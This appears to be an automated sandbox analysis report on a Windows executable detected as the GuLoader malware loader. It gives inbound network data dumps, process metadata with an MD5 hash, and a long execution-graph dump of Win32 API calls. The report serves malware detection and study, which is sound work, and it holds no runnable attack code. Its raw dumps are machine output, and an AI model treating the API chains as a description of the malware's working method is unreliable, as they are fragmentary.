2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 6d f9 e9 e8 0e d0 bd 12 4c 17 9a e6 f1 c5 6f 85 9b 86 c5 60 37 58 6a c8 42 9c 66 50 c6 52 d6 67 1d 63 ee 40 69 f3 cd 38 14 5a 43 5c d0 59 84 ef f7 7d a5 51 31 f1 52 f6 f5 f5 70 26 06 11 92 94 19 b0 bd 4e 99 c5 33 49 29 70 e9 24 40 50 2f 13 62 b3 0e 68 56 be 1b d0 62 76 47 b4 47 e3 a6 3f 7d a8 21 bb 9f 37 e2 90 15 b6 5c c0 a8 c7 48 85 9e ec a0 91 93 6b 73 82 1a 81 ca 6f 42 1a a3 60 bc 63 b9 45 24 df 06 43 3f 7a d5 9f e5 a9 cc 2b 6b f7 66 ca de 62 25 d2 9b 44 fb 86 d2 9e f1 99 84 8a d9 16 68 32 63 d4 0a 6c 99 a3 c5 0f 70 dd 68 98 ef f4 d3 e5 62 9a 8e 7e 62 b7 93 f3 c4 f2 e4 2f e5 94 56 bd 02 19 1d 0b 79 51 81 2d 45 32 7f 86 5a e0 af d9 c9 08 a3 15 d7 89 48 fe 02 0e 7a 53 cc ed 64 06 19 bd ff 5a 50 04 76 0d 5b 57 e6 51 91 36 8b 44 c2 64 e1 02 f2 d4 ad 80 d8
Data Ascii: mLo`7XjBfPRgc@i8ZC\Y}Q1Rp&N3I)p$@P/bhVbvGG?}!7\HksoB`cE$C?z+kfb%Dh2clphb~b/VyQ-E2ZHzSdZPv[WQ6Dd
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 39 0c 3a 49 2d bf e3 98 2e 53 96 bc 7a 9e fa 61 6f 7e 06 21 a8 17 5b c0 f2 68 b0 0b 7f 4a 42 91 5d 9f ce 92 4c 53 a5 87 d8 dd 97 50 45 ae 22 a6 1c e3 eb c6 19 47 1a 1b 04 b6 f7 49 66 6b 1e 75 5b 6f f0 5b 5a bf 59 45 ac 93 28 83 a1 3b 99 a6 f7 52 68 cd 6d a6 81 6b 65 fe f8 2a f7 0a eb 16 5d 05 04 d1 62 ea b2 e3 21 71 12 25 73 40 36 65 66 3f d4 c4 0a 3b 03 62 51 5a 1a a7 95 ad f3 41 b3 25 fe 49 3e 37 ce 57 24 60 6c 88 d4 04 45 47 87 b2 3e 46 64 50 66 a9 6e 85 b9 b8 0b 6d c1 d0 51 d7 22 24 85 96 53 c9 5f 4f fb ca 65 de 48 6d a7 fd 60 0d c8 34 29 e3 fa ff e3 6d 23 30 f1 99 e3 32 fa 53 0b d1 30 fe a5 e6 34 d9 5b e5 22 af 61 3a 2c 4b 9b 75 16 0d a5 f0 e6 a1 76 77 1d 0d 55 3b 5a 37 0f 64 4c 0c fe 69 21 86 f3 f8 d7 ba 59 b6 28 6a 69 f7 78 77 45 cc 2c 00 b0 20 cf
Data Ascii: 9:I-.Szao~![hJB]LSPE"GIfku[o[ZYE(;Rhmke*]b!q%s@6ef?;bQZA%I>7W$`lEG>FdPfnmQ"$S_OeHm`4)m#02S04["a:,KuvwU;Z7dLi!Y(jixwE,
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 24 a1 db 4f 33 ad d2 2b 96 43 f0 76 43 1e 75 f2 5b 04 6a 74 69 e4 4b fe 40 06 b2 a5 98 21 bb 37 d4 b4 a7 0b 8d d7 97 79 e9 15 fd 26 0f 15 96 d8 96 c9 41 9f 83 29 5f 3b 9e 04 e0 03 15 c5 4a 4b 45 0b e2 47 db 11 22 24 b1 84 f1 db 9f 4a 05 97 d9 be 9d 64 d6 e3 8b 0a a6 2f a8 0a 3d 02 43 15 4b 51 e2 d0 ee d7 03 da f0 87 06 09 f9 b2 4f be 09 95 7b 8c 4f b4 26 f1 09 3f d8 e7 2e 13 f0 17 31 6c ee c6 93 02 ce bb c1 63 23 bc c1 77 67 4b dd 31 11 5f 48 a8 33 55 4e 4e bb d2 18 93 84 72 d3 d2 ae 40 50 b1 c4 11 a4 d2 eb 71 1d f7 b1 82 cb 87 58 ca 27 95 45 ff c6 46 46 bf c2 fc 95 09 ca 52 ae 78 08 cb 45 0a 40 9b 03 42 c3 1a de 56 cf 73 0e cf 66 d3 2b 10 a4 eb 56 e9 f1 92 8e 74 eb 44 9e bd 37 68 bd 12 d7 d4 a9 9a 19 3b 5e cb 2a fa 7e f0 4f 70 72 8d 7e 2a 67 8a 69 18 8b
Data Ascii: $O3+CvCu[jtiK@!7y&A)_;JKEG"$Jd/=CKQO{O&?.1lc#wgK1_H3UNNr@PqX'EFFRxE@BVsf+VtD7h;^*~Opr~*gi


                                                            Target ID:0
                                                            Start time:13:15:19
                                                            Start date:20/10/2024
                                                            Path:C:\Users\user\Desktop\450707124374000811.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                            Imagebase:0x400000
                                                            File size:1'001'467 bytes
                                                            MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:13:16:43
                                                            Start date:20/10/2024
                                                            Path:C:\Users\user\Desktop\450707124374000811.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                            Imagebase:0x400000
                                                            File size:1'001'467 bytes
                                                            MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:22.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:19.6%
                                                              Total number of Nodes:1542
                                                              Total number of Limit Nodes:46
execution_graph: serialized node/edge dump behind the rendered execution-graph widget (node IDs, code addresses such as 401941, 405990 and 401e43, and the Win32 APIs reached on each path: GlobalAlloc, GlobalFree, DeleteFileW, lstrcpynW, FindFirstFileW, FindNextFileW, FindClose, lstrcatW, lstrlenW, CharPrevW, CharNextW, MoveFileExW, GetFileAttributesW, SetFileAttributesW, RemoveDirectoryW, GetShortPathNameW, CreateFileW, CloseHandle, GetFileSize, ReadFile, WriteFile, SetFilePointer, lstrcpyA, lstrlenA, lstrcmpiA, CharNextA, wsprintfA, wsprintfW, SetCurrentDirectoryW, CreateDirectoryW, GetLastError, SetFileSecurityW, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, LoadLibraryExW, ShowWindow, EnableWindow, MultiByteToWideChar, GetPrivateProfileStringW, GetFullPathNameW, SHFileOperationW, Sleep). The graph itself is not reproducible as text; the dump is truncated at the end of the page.
402abf 5000->5002 5003 4022d7 5004 4022de 5003->5004 5008 4022f1 5003->5008 5005 4062a4 17 API calls 5004->5005 5006 4022eb 5005->5006 5007 4058e4 MessageBoxIndirectW 5006->5007 5007->5008 5009 401d57 GetDlgItem GetClientRect 5010 402c37 17 API calls 5009->5010 5011 401d89 LoadImageW SendMessageW 5010->5011 5012 401da7 DeleteObject 5011->5012 5013 402abf 5011->5013 5012->5013 5014 402dd7 5015 402e02 5014->5015 5016 402de9 SetTimer 5014->5016 5017 402e57 5015->5017 5018 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5015->5018 5016->5015 5018->5017 4798 40525a 4799 40526a 4798->4799 4800 40527e 4798->4800 4801 405270 4799->4801 4811 4052c7 4799->4811 4802 405286 IsWindowVisible 4800->4802 4806 4052a6 4800->4806 4804 404263 SendMessageW 4801->4804 4805 405293 4802->4805 4802->4811 4803 4052cc CallWindowProcW 4807 40527a 4803->4807 4804->4807 4808 404bb0 5 API calls 4805->4808 4806->4803 4810 404c30 4 API calls 4806->4810 4809 40529d 4808->4809 4809->4806 4810->4811 4811->4803 4812 40175c 4813 402c37 17 API calls 4812->4813 4814 401763 4813->4814 4815 405da3 2 API calls 4814->4815 4816 40176a 4815->4816 4817 405da3 2 API calls 4816->4817 4817->4816 4818 4023de 4819 402c37 17 API calls 4818->4819 4820 4023f0 4819->4820 4821 402c37 17 API calls 4820->4821 4822 4023fa 4821->4822 4835 402cc7 4822->4835 4825 402432 4828 40243e 4825->4828 4829 402c15 17 API calls 4825->4829 4826 402885 4827 402c37 17 API calls 4831 402428 lstrlenW 4827->4831 4830 40245d RegSetValueExW 4828->4830 4832 4030fa 31 API calls 4828->4832 4829->4828 4833 402473 RegCloseKey 4830->4833 4831->4825 4832->4830 4833->4826 4836 402ce2 4835->4836 4839 40611d 4836->4839 4840 40612c 4839->4840 4841 40240a 4840->4841 4842 406137 RegCreateKeyExW 4840->4842 4841->4825 4841->4826 4841->4827 4842->4841 4067 404c62 GetDlgItem GetDlgItem 4068 404cb4 7 API calls 4067->4068 4076 404ecd 4067->4076 4069 404d57 DeleteObject 4068->4069 4070 404d4a SendMessageW 4068->4070 4071 404d60 4069->4071 4070->4069 4072 
404d6f 4071->4072 4073 404d97 4071->4073 4074 4062a4 17 API calls 4072->4074 4123 404217 4073->4123 4079 404d79 SendMessageW SendMessageW 4074->4079 4075 404f92 4085 404fb1 4075->4085 4087 404fa3 SendMessageW 4075->4087 4076->4075 4082 404f2d 4076->4082 4076->4085 4078 40505d 4080 405067 SendMessageW 4078->4080 4081 40506f 4078->4081 4079->4071 4080->4081 4092 405081 ImageList_Destroy 4081->4092 4093 405088 4081->4093 4103 405098 4081->4103 4128 404bb0 SendMessageW 4082->4128 4083 404dab 4089 404217 18 API calls 4083->4089 4084 405245 4145 40427e 4084->4145 4085->4078 4085->4084 4090 40500a SendMessageW 4085->4090 4087->4085 4109 404db9 4089->4109 4090->4084 4094 40501f SendMessageW 4090->4094 4092->4093 4096 405091 GlobalFree 4093->4096 4093->4103 4098 405032 4094->4098 4095 405207 4095->4084 4099 405219 ShowWindow GetDlgItem ShowWindow 4095->4099 4096->4103 4097 404e8e GetWindowLongW SetWindowLongW 4100 404ea7 4097->4100 4104 405043 SendMessageW 4098->4104 4099->4084 4101 404ec5 4100->4101 4102 404ead ShowWindow 4100->4102 4127 40424c SendMessageW 4101->4127 4126 40424c SendMessageW 4102->4126 4103->4095 4118 4050d3 4103->4118 4133 404c30 4103->4133 4104->4078 4105 404e88 4105->4097 4105->4100 4108 404f3e 4108->4075 4109->4097 4109->4105 4110 404e09 SendMessageW 4109->4110 4111 404e45 SendMessageW 4109->4111 4112 404e56 SendMessageW 4109->4112 4110->4109 4111->4109 4112->4109 4114 404ec0 4114->4084 4115 4051dd InvalidateRect 4115->4095 4116 4051f3 4115->4116 4142 404b6b 4116->4142 4117 405101 SendMessageW 4119 405117 4117->4119 4118->4117 4118->4119 4119->4115 4120 405178 4119->4120 4122 40518b SendMessageW SendMessageW 4119->4122 4120->4122 4122->4119 4124 4062a4 17 API calls 4123->4124 4125 404222 SetDlgItemTextW 4124->4125 4125->4083 4126->4114 4127->4076 4129 404bd3 GetMessagePos ScreenToClient SendMessageW 4128->4129 4130 404c0f SendMessageW 4128->4130 4131 404c07 4129->4131 4132 404c0c 4129->4132 4130->4131 4131->4108 4132->4130 4159 406282 lstrcpynW 
4133->4159 4135 404c43 4160 4061c9 wsprintfW 4135->4160 4137 404c4d 4161 40140b 4137->4161 4141 404c5d 4141->4118 4169 404aa2 4142->4169 4144 404b80 4144->4095 4146 404296 GetWindowLongW 4145->4146 4147 40431f 4145->4147 4146->4147 4148 4042a7 4146->4148 4149 4042b6 GetSysColor 4148->4149 4150 4042b9 4148->4150 4149->4150 4151 4042c9 SetBkMode 4150->4151 4152 4042bf SetTextColor 4150->4152 4153 4042e1 GetSysColor 4151->4153 4154 4042e7 4151->4154 4152->4151 4153->4154 4155 4042f8 4154->4155 4156 4042ee SetBkColor 4154->4156 4155->4147 4157 404312 CreateBrushIndirect 4155->4157 4158 40430b DeleteObject 4155->4158 4156->4155 4157->4147 4158->4157 4159->4135 4160->4137 4165 401389 4161->4165 4164 406282 lstrcpynW 4164->4141 4167 401390 4165->4167 4166 4013fe 4166->4164 4167->4166 4168 4013cb MulDiv SendMessageW 4167->4168 4168->4167 4172 404abb 4169->4172 4170 4062a4 17 API calls 4171 404b1f 4170->4171 4173 4062a4 17 API calls 4171->4173 4172->4170 4174 404b2a 4173->4174 4175 4062a4 17 API calls 4174->4175 4176 404b40 lstrlenW wsprintfW SetDlgItemTextW 4175->4176 4176->4144 5019 402862 5020 402c37 17 API calls 5019->5020 5021 402869 FindFirstFileW 5020->5021 5022 402891 5021->5022 5023 40287c 5021->5023 5027 4061c9 wsprintfW 5022->5027 5025 40289a 5028 406282 lstrcpynW 5025->5028 5027->5025 5028->5023 5029 401563 5030 402a65 5029->5030 5033 4061c9 wsprintfW 5030->5033 5032 402a6a 5033->5032 5034 404365 lstrlenW 5035 404384 5034->5035 5036 404386 WideCharToMultiByte 5034->5036 5035->5036 5037 4046e6 5038 404712 5037->5038 5039 404723 5037->5039 5098 4058c8 GetDlgItemTextW 5038->5098 5040 40472f GetDlgItem 5039->5040 5043 40478e 5039->5043 5042 404743 5040->5042 5047 404757 SetWindowTextW 5042->5047 5050 405bfe 4 API calls 5042->5050 5044 404872 5043->5044 5052 4062a4 17 API calls 5043->5052 5096 404a21 5043->5096 5044->5096 5100 4058c8 GetDlgItemTextW 5044->5100 5045 40471d 5046 406516 5 API calls 5045->5046 5046->5039 5051 404217 18 API calls 5047->5051 5049 40427e 8 
API calls 5054 404a35 5049->5054 5055 40474d 5050->5055 5056 404773 5051->5056 5057 404802 SHBrowseForFolderW 5052->5057 5053 4048a2 5058 405c5b 18 API calls 5053->5058 5055->5047 5061 405b53 3 API calls 5055->5061 5059 404217 18 API calls 5056->5059 5057->5044 5060 40481a CoTaskMemFree 5057->5060 5064 4048a8 5058->5064 5062 404781 5059->5062 5063 405b53 3 API calls 5060->5063 5061->5047 5099 40424c SendMessageW 5062->5099 5066 404827 5063->5066 5101 406282 lstrcpynW 5064->5101 5069 40485e SetDlgItemTextW 5066->5069 5073 4062a4 17 API calls 5066->5073 5068 404787 5072 40665c 5 API calls 5068->5072 5069->5044 5070 4048bf 5071 40665c 5 API calls 5070->5071 5079 4048c6 5071->5079 5072->5043 5074 404846 lstrcmpiW 5073->5074 5074->5069 5076 404857 lstrcatW 5074->5076 5075 404907 5102 406282 lstrcpynW 5075->5102 5076->5069 5078 40490e 5080 405bfe 4 API calls 5078->5080 5079->5075 5084 405b9f 2 API calls 5079->5084 5085 40495f 5079->5085 5081 404914 GetDiskFreeSpaceW 5080->5081 5083 404938 MulDiv 5081->5083 5081->5085 5083->5085 5084->5079 5086 4049d0 5085->5086 5088 404b6b 20 API calls 5085->5088 5087 4049f3 5086->5087 5089 40140b 2 API calls 5086->5089 5103 404239 EnableWindow 5087->5103 5090 4049bd 5088->5090 5089->5087 5091 4049d2 SetDlgItemTextW 5090->5091 5092 4049c2 5090->5092 5091->5086 5094 404aa2 20 API calls 5092->5094 5094->5086 5095 404a0f 5095->5096 5104 40463f 5095->5104 5096->5049 5098->5045 5099->5068 5100->5053 5101->5070 5102->5078 5103->5095 5105 404652 SendMessageW 5104->5105 5106 40464d 5104->5106 5105->5096 5106->5105 5107 401968 5108 402c15 17 API calls 5107->5108 5109 40196f 5108->5109 5110 402c15 17 API calls 5109->5110 5111 40197c 5110->5111 5112 402c37 17 API calls 5111->5112 5113 401993 lstrlenW 5112->5113 5114 4019a4 5113->5114 5118 4019e5 5114->5118 5119 406282 lstrcpynW 5114->5119 5116 4019d5 5117 4019da lstrlenW 5116->5117 5116->5118 5117->5118 5119->5116 4266 4027e9 4267 4027f0 4266->4267 4269 402a6a 4266->4269 4268 402c15 17 API calls 
4267->4268 4270 4027f7 4268->4270 4271 402806 SetFilePointer 4270->4271 4271->4269 4272 402816 4271->4272 4274 4061c9 wsprintfW 4272->4274 4274->4269 5120 100018a9 5121 100018cc 5120->5121 5122 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5121->5122 5123 100018ff GlobalFree 5121->5123 5124 10001272 2 API calls 5122->5124 5123->5122 5125 10001a87 GlobalFree GlobalFree 5124->5125 5126 40166a 5127 402c37 17 API calls 5126->5127 5128 401670 5127->5128 5129 4065c5 2 API calls 5128->5129 5130 401676 5129->5130 5131 401ced 5132 402c15 17 API calls 5131->5132 5133 401cf3 IsWindow 5132->5133 5134 401a20 5133->5134 4458 40176f 4459 402c37 17 API calls 4458->4459 4460 401776 4459->4460 4461 401796 4460->4461 4462 40179e 4460->4462 4518 406282 lstrcpynW 4461->4518 4519 406282 lstrcpynW 4462->4519 4465 40179c 4468 406516 5 API calls 4465->4468 4466 4017a9 4467 405b53 3 API calls 4466->4467 4469 4017af lstrcatW 4467->4469 4486 4017bb 4468->4486 4469->4465 4470 4065c5 2 API calls 4470->4486 4471 4017f7 4472 405d4f 2 API calls 4471->4472 4472->4486 4474 4017cd CompareFileTime 4474->4486 4475 40188d 4476 4052e6 24 API calls 4475->4476 4478 401897 4476->4478 4477 401864 4479 4052e6 24 API calls 4477->4479 4496 401879 4477->4496 4498 4030fa 4478->4498 4479->4496 4480 406282 lstrcpynW 4480->4486 4483 4018be SetFileTime 4485 4018d0 CloseHandle 4483->4485 4484 4062a4 17 API calls 4484->4486 4487 4018e1 4485->4487 4485->4496 4486->4470 4486->4471 4486->4474 4486->4475 4486->4477 4486->4480 4486->4484 4497 405d74 GetFileAttributesW CreateFileW 4486->4497 4520 4058e4 4486->4520 4488 4018e6 4487->4488 4489 4018f9 4487->4489 4490 4062a4 17 API calls 4488->4490 4491 4062a4 17 API calls 4489->4491 4493 4018ee lstrcatW 4490->4493 4494 401901 4491->4494 4493->4494 4495 4058e4 MessageBoxIndirectW 4494->4495 4495->4496 4497->4486 4500 403113 4498->4500 4499 403141 4524 403315 4499->4524 4500->4499 4527 40332b SetFilePointer 4500->4527 4504 4032ae 4506 4032f0 4504->4506 4507 4032b2 
4504->4507 4505 40315e GetTickCount 4510 4018aa 4505->4510 4517 4031ad 4505->4517 4508 403315 ReadFile 4506->4508 4507->4510 4511 403315 ReadFile 4507->4511 4512 405e26 WriteFile 4507->4512 4508->4510 4509 403315 ReadFile 4509->4517 4510->4483 4510->4485 4511->4507 4512->4507 4513 403203 GetTickCount 4513->4517 4514 403228 MulDiv wsprintfW 4515 4052e6 24 API calls 4514->4515 4515->4517 4516 405e26 WriteFile 4516->4517 4517->4509 4517->4510 4517->4513 4517->4514 4517->4516 4518->4465 4519->4466 4521 4058f9 4520->4521 4522 405945 4521->4522 4523 40590d MessageBoxIndirectW 4521->4523 4522->4486 4523->4522 4525 405df7 ReadFile 4524->4525 4526 40314c 4525->4526 4526->4504 4526->4505 4526->4510 4527->4499 5135 402570 5136 402c37 17 API calls 5135->5136 5137 402577 5136->5137 5140 405d74 GetFileAttributesW CreateFileW 5137->5140 5139 402583 5140->5139 4528 401b71 4529 401bc2 4528->4529 4530 401b7e 4528->4530 4531 401bc7 4529->4531 4532 401bec GlobalAlloc 4529->4532 4533 401c07 4530->4533 4538 401b95 4530->4538 4542 4022f1 4531->4542 4549 406282 lstrcpynW 4531->4549 4534 4062a4 17 API calls 4532->4534 4535 4062a4 17 API calls 4533->4535 4533->4542 4534->4533 4537 4022eb 4535->4537 4541 4058e4 MessageBoxIndirectW 4537->4541 4547 406282 lstrcpynW 4538->4547 4539 401bd9 GlobalFree 4539->4542 4541->4542 4543 401ba4 4548 406282 lstrcpynW 4543->4548 4545 401bb3 4550 406282 lstrcpynW 4545->4550 4547->4543 4548->4545 4549->4539 4550->4542 5141 401a72 5142 402c15 17 API calls 5141->5142 5143 401a78 5142->5143 5144 402c15 17 API calls 5143->5144 5145 401a20 5144->5145 5146 4024f2 5147 402c77 17 API calls 5146->5147 5148 4024fc 5147->5148 5149 402c15 17 API calls 5148->5149 5150 402505 5149->5150 5151 402521 RegEnumKeyW 5150->5151 5152 40252d RegEnumValueW 5150->5152 5154 402885 5150->5154 5153 402542 RegCloseKey 5151->5153 5152->5153 5153->5154 4551 403373 SetErrorMode GetVersion 4552 4033b2 4551->4552 4553 4033b8 4551->4553 4554 40665c 5 API calls 4552->4554 4555 4065ec 3 API calls 
4553->4555 4554->4553 4556 4033ce lstrlenA 4555->4556 4556->4553 4557 4033de 4556->4557 4558 40665c 5 API calls 4557->4558 4559 4033e5 4558->4559 4560 40665c 5 API calls 4559->4560 4561 4033ec 4560->4561 4562 40665c 5 API calls 4561->4562 4563 4033f8 #17 OleInitialize SHGetFileInfoW 4562->4563 4642 406282 lstrcpynW 4563->4642 4566 403444 GetCommandLineW 4643 406282 lstrcpynW 4566->4643 4568 403456 GetModuleHandleW 4569 40346e 4568->4569 4570 405b80 CharNextW 4569->4570 4571 40347d CharNextW 4570->4571 4572 4035a7 GetTempPathW 4571->4572 4580 403496 4571->4580 4644 403342 4572->4644 4574 4035bf 4575 4035c3 GetWindowsDirectoryW lstrcatW 4574->4575 4576 403619 DeleteFileW 4574->4576 4577 403342 12 API calls 4575->4577 4654 402ec1 GetTickCount GetModuleFileNameW 4576->4654 4581 4035df 4577->4581 4578 405b80 CharNextW 4578->4580 4580->4578 4586 403592 4580->4586 4588 403590 4580->4588 4581->4576 4583 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4581->4583 4582 40362d 4584 4036e0 4582->4584 4589 4036d0 4582->4589 4594 405b80 CharNextW 4582->4594 4587 403342 12 API calls 4583->4587 4741 4038b6 4584->4741 4738 406282 lstrcpynW 4586->4738 4592 403611 4587->4592 4588->4572 4682 403990 4589->4682 4592->4576 4592->4584 4606 40364c 4594->4606 4595 40381a 4598 403822 GetCurrentProcess OpenProcessToken 4595->4598 4599 40389e ExitProcess 4595->4599 4596 4036fa 4597 4058e4 MessageBoxIndirectW 4596->4597 4603 403708 ExitProcess 4597->4603 4604 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4598->4604 4605 40386e 4598->4605 4601 403710 4608 40584f 5 API calls 4601->4608 4602 4036aa 4607 405c5b 18 API calls 4602->4607 4604->4605 4609 40665c 5 API calls 4605->4609 4606->4601 4606->4602 4610 4036b6 4607->4610 4611 403715 lstrcatW 4608->4611 4612 403875 4609->4612 4610->4584 4739 406282 lstrcpynW 4610->4739 4613 403731 lstrcatW lstrcmpiW 4611->4613 4614 403726 lstrcatW 4611->4614 4615 40388a ExitWindowsEx 4612->4615 4616 403897 4612->4616 4613->4584 
4618 40374d 4613->4618 4614->4613 4615->4599 4615->4616 4619 40140b 2 API calls 4616->4619 4621 403752 4618->4621 4622 403759 4618->4622 4619->4599 4620 4036c5 4740 406282 lstrcpynW 4620->4740 4625 4057b5 4 API calls 4621->4625 4623 405832 2 API calls 4622->4623 4627 40375e SetCurrentDirectoryW 4623->4627 4626 403757 4625->4626 4626->4627 4628 403779 4627->4628 4629 40376e 4627->4629 4749 406282 lstrcpynW 4628->4749 4748 406282 lstrcpynW 4629->4748 4632 4062a4 17 API calls 4633 4037b8 DeleteFileW 4632->4633 4634 4037c5 CopyFileW 4633->4634 4639 403787 4633->4639 4634->4639 4635 40380e 4636 406048 36 API calls 4635->4636 4636->4584 4637 406048 36 API calls 4637->4639 4638 4062a4 17 API calls 4638->4639 4639->4632 4639->4635 4639->4637 4639->4638 4640 405867 2 API calls 4639->4640 4641 4037f9 CloseHandle 4639->4641 4640->4639 4641->4639 4642->4566 4643->4568 4645 406516 5 API calls 4644->4645 4646 40334e 4645->4646 4647 403358 4646->4647 4648 405b53 3 API calls 4646->4648 4647->4574 4649 403360 4648->4649 4650 405832 2 API calls 4649->4650 4651 403366 4650->4651 4750 405da3 4651->4750 4754 405d74 GetFileAttributesW CreateFileW 4654->4754 4656 402f01 4675 402f11 4656->4675 4755 406282 lstrcpynW 4656->4755 4658 402f27 4659 405b9f 2 API calls 4658->4659 4660 402f2d 4659->4660 4756 406282 lstrcpynW 4660->4756 4662 402f38 GetFileSize 4663 403034 4662->4663 4681 402f4f 4662->4681 4757 402e5d 4663->4757 4665 40303d 4667 40306d GlobalAlloc 4665->4667 4665->4675 4769 40332b SetFilePointer 4665->4769 4666 403315 ReadFile 4666->4681 4768 40332b SetFilePointer 4667->4768 4670 4030a0 4672 402e5d 6 API calls 4670->4672 4671 403088 4674 4030fa 31 API calls 4671->4674 4672->4675 4673 403056 4676 403315 ReadFile 4673->4676 4679 403094 4674->4679 4675->4582 4678 403061 4676->4678 4677 402e5d 6 API calls 4677->4681 4678->4667 4678->4675 4679->4675 4679->4679 4680 4030d1 SetFilePointer 4679->4680 4680->4675 4681->4663 4681->4666 4681->4670 4681->4675 4681->4677 4683 40665c 5 API calls 
4682->4683 4684 4039a4 4683->4684 4685 4039aa 4684->4685 4686 4039bc 4684->4686 4778 4061c9 wsprintfW 4685->4778 4687 406150 3 API calls 4686->4687 4688 4039ec 4687->4688 4690 403a0b lstrcatW 4688->4690 4692 406150 3 API calls 4688->4692 4691 4039ba 4690->4691 4770 403c66 4691->4770 4692->4690 4695 405c5b 18 API calls 4696 403a3d 4695->4696 4697 403ad1 4696->4697 4699 406150 3 API calls 4696->4699 4698 405c5b 18 API calls 4697->4698 4700 403ad7 4698->4700 4701 403a6f 4699->4701 4702 403ae7 LoadImageW 4700->4702 4703 4062a4 17 API calls 4700->4703 4701->4697 4706 403a90 lstrlenW 4701->4706 4710 405b80 CharNextW 4701->4710 4704 403b8d 4702->4704 4705 403b0e RegisterClassW 4702->4705 4703->4702 4709 40140b 2 API calls 4704->4709 4707 403b44 SystemParametersInfoW CreateWindowExW 4705->4707 4708 403b97 4705->4708 4711 403ac4 4706->4711 4712 403a9e lstrcmpiW 4706->4712 4707->4704 4708->4584 4713 403b93 4709->4713 4714 403a8d 4710->4714 4716 405b53 3 API calls 4711->4716 4712->4711 4715 403aae GetFileAttributesW 4712->4715 4713->4708 4719 403c66 18 API calls 4713->4719 4714->4706 4718 403aba 4715->4718 4717 403aca 4716->4717 4779 406282 lstrcpynW 4717->4779 4718->4711 4722 405b9f 2 API calls 4718->4722 4720 403ba4 4719->4720 4723 403bb0 ShowWindow 4720->4723 4724 403c33 4720->4724 4722->4711 4725 4065ec 3 API calls 4723->4725 4780 4053b9 OleInitialize 4724->4780 4730 403bc8 4725->4730 4727 403c39 4728 403c55 4727->4728 4731 403c3d 4727->4731 4732 40140b 2 API calls 4728->4732 4729 403bd6 GetClassInfoW 4734 403c00 DialogBoxParamW 4729->4734 4735 403bea GetClassInfoW RegisterClassW 4729->4735 4730->4729 4733 4065ec 3 API calls 4730->4733 4731->4708 4736 40140b 2 API calls 4731->4736 4732->4708 4733->4729 4737 40140b 2 API calls 4734->4737 4735->4734 4736->4708 4737->4708 4738->4588 4739->4620 4740->4589 4742 4038c0 CloseHandle 4741->4742 4743 4038ce 4741->4743 4742->4743 4794 4038fb 4743->4794 4746 405990 67 API calls 4747 4036e9 OleUninitialize 4746->4747 4747->4595 
4747->4596 4748->4628 4749->4639 4751 405db0 GetTickCount GetTempFileNameW 4750->4751 4752 403371 4751->4752 4753 405de6 4751->4753 4752->4574 4753->4751 4753->4752 4754->4656 4755->4658 4756->4662 4758 402e66 4757->4758 4759 402e7e 4757->4759 4760 402e76 4758->4760 4761 402e6f DestroyWindow 4758->4761 4762 402e86 4759->4762 4763 402e8e GetTickCount 4759->4763 4760->4665 4761->4760 4764 406698 2 API calls 4762->4764 4765 402e9c CreateDialogParamW ShowWindow 4763->4765 4766 402ebf 4763->4766 4767 402e8c 4764->4767 4765->4766 4766->4665 4767->4665 4768->4671 4769->4673 4771 403c7a 4770->4771 4787 4061c9 wsprintfW 4771->4787 4773 403ceb 4788 403d1f 4773->4788 4775 403a1b 4775->4695 4776 403cf0 4776->4775 4777 4062a4 17 API calls 4776->4777 4777->4776 4778->4691 4779->4697 4791 404263 4780->4791 4782 4053dc 4785 401389 2 API calls 4782->4785 4786 405403 4782->4786 4783 404263 SendMessageW 4784 405415 OleUninitialize 4783->4784 4784->4727 4785->4782 4786->4783 4787->4773 4789 4062a4 17 API calls 4788->4789 4790 403d2d SetWindowTextW 4789->4790 4790->4776 4792 40427b 4791->4792 4793 40426c SendMessageW 4791->4793 4792->4782 4793->4792 4795 403909 4794->4795 4796 40390e FreeLibrary GlobalFree 4795->4796 4797 4038d3 4795->4797 4796->4796 4796->4797 4797->4746 5156 401573 5157 401583 ShowWindow 5156->5157 5158 40158c 5156->5158 5157->5158 5159 40159a ShowWindow 5158->5159 5160 402abf 5158->5160 5159->5160 5161 4014f5 SetForegroundWindow 5162 402abf 5161->5162 5163 100016b6 5164 100016e5 5163->5164 5165 10001b18 22 API calls 5164->5165 5166 100016ec 5165->5166 5167 100016f3 5166->5167 5168 100016ff 5166->5168 5171 10001272 2 API calls 5167->5171 5169 10001726 5168->5169 5170 10001709 5168->5170 5173 10001750 5169->5173 5174 1000172c 5169->5174 5172 1000153d 3 API calls 5170->5172 5175 100016fd 5171->5175 5176 1000170e 5172->5176 5178 1000153d 3 API calls 5173->5178 5177 100015b4 3 API calls 5174->5177 5179 100015b4 3 API calls 5176->5179 5180 10001731 5177->5180 5178->5175 
